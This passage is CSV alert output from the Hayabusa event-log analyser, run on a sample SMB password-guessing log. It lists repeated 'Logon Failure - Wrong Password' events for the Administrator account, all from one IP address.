NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
